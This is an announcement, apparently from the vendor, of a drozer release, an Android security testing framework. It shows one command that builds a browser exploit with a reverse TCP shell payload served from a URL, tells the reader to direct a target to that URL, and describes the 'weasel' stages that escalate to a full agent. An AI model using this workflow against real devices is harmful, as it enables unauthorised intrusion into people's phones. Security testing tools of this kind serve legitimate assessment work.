Introducing drozer

Building an Exploit

You will instantly notice the new drozer exploit command. This allows you to prepare an exploit by taking a known vulnerability and combining it with some shellcode before pushing it to the revamped drozer server:

$ drozer exploit build exploit.remote.browser.nanparse --payload weasel.reverse_tcp.armeabi
...
...
Done. The exploit is available at: http://10.0.7.94:31415/view.jsp?token=shfNi1ndAdc0Z5r5

Simply direct your target to the given address and let drozer do the rest.

Watch Out: weasel!

It would be a bit of a cheat if we just popped a shell and left you to it… That’s why drozer uses weasels.

When the shellcode executes, we create a reverse TCP shell to the drozer server and ask for weasel. Our advanced exploitation payload then tries to get the maximum leverage on the target device.

There are three ‘weasels’:

• privileged_weasel() – got INSTALL_PACKAGES? get a full drozer agent
• sneaky_weasel() – loads most of an agent using app_process
• defeated_weasel() – send a shell

Whatever weasel finds for you, you can always escalate your privilege and send in more weasels to get that full agent.

Get it Now!

drozer is still open source, and can be downloaded from downloads page right now! There’s also a new Users’ Guide available that’ll show you how it use it.

As ever, the biggest thanks must go to our users who contributed ideas and criticism to help us make the release of drozer the most awesome yet. You can find us on Twitter and Github.